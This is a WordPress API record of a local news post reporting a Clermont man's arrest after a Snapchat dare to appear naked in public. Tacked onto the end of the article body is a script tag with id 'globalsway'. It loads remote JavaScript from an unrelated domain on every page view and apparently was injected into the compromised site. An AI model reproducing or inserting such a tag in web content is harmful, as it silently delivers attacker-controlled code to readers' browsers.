{"id":222183,"date":"2020-04-28T13:43:00","date_gmt":"2020-04-28T17:43:00","guid":{"rendered":"https:\/\/wordpress-1.tempurl.host\/?p=222183"},"modified":"2020-05-02T13:39:30","modified_gmt":"2020-05-02T17:39:30","slug":"alleged-snapchat-dare-lands-clermont-man-in-jail","status":"publish","type":"post","link":"https:\/\/thegraphicgeek.com\/demo-cflwire\/alleged-snapchat-dare-lands-clermont-man-in-jail\/","title":{"rendered":"Alleged Snapchat Dare Lands Clermont Man in Jail"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">A Clermont man was arrested Monday afternoon after claiming that he was dared to &#8220;take all of his clothes off in a public area&#8221; by a friend via the popular social media app, Snapchat.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lake County deputies were dispatched to an apartment complex on Nelson Park Drive shortly after 4 p.m. after receiving calls about a man standing nude in the bushes at the complex.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Upon arrival, witnesses told deputies they saw the man standing completely naked with his penis exposed standing in some bushes along Glenbrook Drive as they were riding in their vehicle.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The victims told deputies they were riding in the vehicle with a juvenile passenger when they noticed the man, later identified as 20-year-old Ivan Butcher, standing naked in the bushes.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The driver of the vehicle told deputies he stopped the vehicle and got out to confront Butcher at which time Butcher put his clothes back on and took off running.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The driver then took out his cell phone and recorded video footage as Butcher fled the area and jumped through more bushes behind the apartment complex.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A member of the complex&#8217;s management office was able to help identify Butcher and lead deputies to his apartment.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Upon questioning, Butcher told deputies that he had stood there naked because a friend on Snapchat dared him to get completely naked in a public place.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Butcher stated that once he saw the victims&#8217; vehicle, he fled the area to avoid getting into trouble.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Butcher was arrested and charged with lewd and lascivious exhibition with a juvenile victim.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">He was transported to the Lake County Jail where he was later released after posting a $10,000 bail.<\/p>\n<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script>","protected":false},"excerpt":{"rendered":"<p>A Clermont man was arrested after getting naked in public on a Snapchat dare.<\/p>\n","protected":false},"author":1,"featured_media":222184,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"wds_primary_category":0,"footnotes":""},"categories":[3244,3245,6,1],"tags":[657,2450,749,2053,1614,690,689,1406,2453],"class_list":["post-222183","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-arrests","category-crime","category-lake-county","category-local","tag-arrested","tag-arrests","tag-clermont","tag-deputies","tag-juvenile","tag-lakeco","tag-lakecounty","tag-lascivious","tag-lewd","entry","rows"],"jetpack_featured_media_url":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-content\/uploads\/sites\/6\/ivan-butcher.jpg","jetpack_sharing_enabled":true,"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/posts\/222183","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/comments?post=222183"}],"version-history":[{"count":0,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/posts\/222183\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/media\/222184"}],"wp:attachment":[{"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/media?parent=222183"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/categories?post=222183"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/tags?post=222183"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
